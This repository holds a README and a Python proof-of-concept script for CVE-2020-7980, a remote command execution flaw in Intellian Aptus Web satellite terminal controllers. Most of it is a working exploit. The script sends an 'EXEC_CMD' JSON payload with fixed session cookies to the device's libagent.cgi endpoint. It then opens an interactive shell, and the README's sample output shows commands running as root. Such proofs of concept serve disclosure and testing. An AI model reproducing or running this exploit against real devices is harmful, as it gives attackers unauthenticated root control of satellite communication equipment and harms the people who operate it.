├── README.md
└── satellian.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Satellian-CVE-2020-7980
 2 | Satellian is a PoC script that shows RCE vulnerability over Intellian Satellite controller (Intellian Aptus Web).
 3 | 
 4 | The following script will try to list all the binaries in the system and afterwards will allow the tester to interact directly with the server (usually as root).
 5 | 
 6 | # PoC
 7 | ```
 8 | xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
 9 |                   ________________________________________
10 |          (__)    /                                        \
11 |          (oo)   (     Intellian Satellite Terminal PoC     )
12 |   /-------\/ --' \________________________________________/ 
13 |  / |     ||
14 | *  ||----||             
15 | 
16 | Performing initial scan. Listing available system binaries.
17 | Starting request to http://<redacted>
18 | Executing command /bin/ls /bin
19 | acu_server
20 | acu_tool
21 | addgroup
22 | adduser
23 | ...
24 | 
25 | Satellian $ id
26 | uid=0(root) gid=0(root)
27 | ```
28 | 
29 | # Tested versions
30 | Intellian v1.12, v1.21, v1.24.
31 | 
32 | 
33 | # Disclaimer
34 | All the information in this repository is for educational purposes only. The author of the repository is in no way responsible for any misuse of the information. This script is just a proof of concept, and has not been in no way developed for malicious activities.
35 | 


--------------------------------------------------------------------------------
/satellian.py:
--------------------------------------------------------------------------------
 1 | # Exploit Title: Satellian
 2 | # Date: 28/01/2020
 3 | # Exploit Author: Xh4H
 4 | # Vendor Homepage: https://www.intelliantech.com/?lang=en
 5 | # Version: v1.12+
 6 | # Tested on: Kali linux, MacOS
 7 | # CVE : CVE-2020-7980
 8 | 
 9 | # xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
10 | #                   ________________________________________
11 | #         (__)    /                                        \
12 | #         (oo)   (     Intellian Satellite Terminal PoC     )
13 | #   /-------\/ --' \________________________________________/ 
14 | #  / |     ||
15 | # *  ||----||             
16 | 
17 | # Performing initial scan. Listing available system binaries.
18 | # Starting request to http://<redacted>
19 | # Executing command /bin/ls /bin
20 | # acu_server
21 | # acu_tool
22 | # addgroup
23 | # adduser
24 | # ...
25 | 
26 | # Satellian $ id
27 | # uid=0(root) gid=0(root)
28 | 
29 | import requests
30 | import argparse
31 | import sys
32 | import calendar
33 | import time
34 | from termcolor import colored
35 | 
36 | def cprint(text, color): # colored print
37 | 	sys.stdout.write(colored(text + "\n", color, attrs=["bold"]))
38 | 
39 | def httpize(url):
40 | 	if not url.startswith("http"):
41 | 		cprint("Missing protocol, using http . . .", "yellow")
42 | 		url = "http://" + url
43 | 	return url
44 | 
45 | def send_command(url, command, verbose):
46 | 	RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}}
47 | 	string_to_split = '''"SUCCESS_"
48 | },'''
49 | 
50 | 	if verbose:
51 | 		cprint("Starting request to %s" % url, "yellow")
52 | 		cprint("Executing command %s" % command, "yellow")
53 | 
54 | 	a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})
55 | 	command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')
56 | 
57 | 	if len(command_output) < 4 and verbose:
58 | 		cprint("Target doesn't seem to be vulnerable\nExiting.", 'red')
59 | 		sys.exit()
60 | 	print command_output
61 | 
62 | cprint("""
63 |                   ________________________________________
64 |          (__)    /                                        \\
65 |          (oo)   (     Intellian Satellite Terminal PoC     )
66 |   /-------\\/ --' \\________________________________________/ 
67 |  / |     ||
68 | *  ||----||             
69 | """, "green")
70 | 
71 | parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980")
72 | parser.add_argument("-u", "--url", help="Base url")
73 | args = parser.parse_args()
74 | 
75 | if args.url is None:
76 | 	cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red")
77 | 	sys.exit()
78 | 
79 | url = httpize(args.url)
80 | 
81 | def main():
82 | 	cprint("Performing initial scan. Listing available system binaries.", "green")
83 | 	send_command(url, '/bin/ls /bin', True)
84 | 
85 | 	while True:
86 | 		command = raw_input('Satellian $ ')
87 | 		send_command(url, command, False)
88 | 
89 | if __name__ == '__main__':
90 | 	try:
91 | 		main()
92 | 	except Exception as e:
93 | 		print e
94 | 		print "\nAn error happened."
95 | 


--------------------------------------------------------------------------------